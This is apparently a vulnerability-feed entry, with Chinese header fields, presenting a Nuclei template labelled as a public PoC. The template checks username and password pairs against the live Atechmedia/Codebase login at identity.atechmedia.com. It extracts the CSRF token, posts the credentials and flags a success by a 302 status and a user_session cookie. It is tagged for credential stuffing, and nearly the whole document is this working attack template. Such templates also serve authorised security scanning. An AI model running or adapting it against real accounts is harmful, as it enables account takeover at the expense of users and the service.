atechmedia-codebase-login-check: Atechmedia/Codebase Login Check

日期: 2025-08-01 | 影响软件: Atechmedia Codebase | POC: 已公开

漏洞描述

Checks for a valid Atechmedia/Codebase account.

PoC代码[已公开]

id: atechmedia-codebase-login-check

info:
  name: Atechmedia/Codebase Login Check
  author: parthmalhotra,pdresearch
  severity: critical
  description: Checks for a valid Atechmedia/Codebase account.
  reference:
    - https://owasp.org/www-community/attacks/Credential_stuffing
  metadata:
    max-request: 2
  tags: cloud,creds-stuffing,login-check,atechmedia,codebase

self-contained: true

http:
  - raw:
      - |
        GET https://identity.atechmedia.com/login HTTP/1.1
        Host: identity.atechmedia.com
        Referer: https://identity.atechmedia.com/login
      - |
        POST https://identity.atechmedia.com/login HTTP/1.1
        Host: identity.atechmedia.com
        Origin: https://identity.atechmedia.com
        Content-Type: application/x-www-form-urlencoded
        Referer: https://identity.atechmedia.com/login

        utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login

    extractors:
      - type: xpath
        name: authenticity_token
        part: body
        attribute: value
        internal: true
        xpath:
          - /html/body/div/div[2]/div/form/input[2]

      - type: dsl
        dsl:
          - username
          - password

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: user_session'

      - type: status
        status:
          - 302
# digest: 4a0a0047304502201150da05ad2d6fd7cc949450881f4d3da30d12e08f302f32e98eed9edb8cf4c20221008cdd48a60dcc0cc25b9fc6347116a6c83793bc6bf105db52cc2789faa382ea14:922c64590222798bb761d5b6d8e72950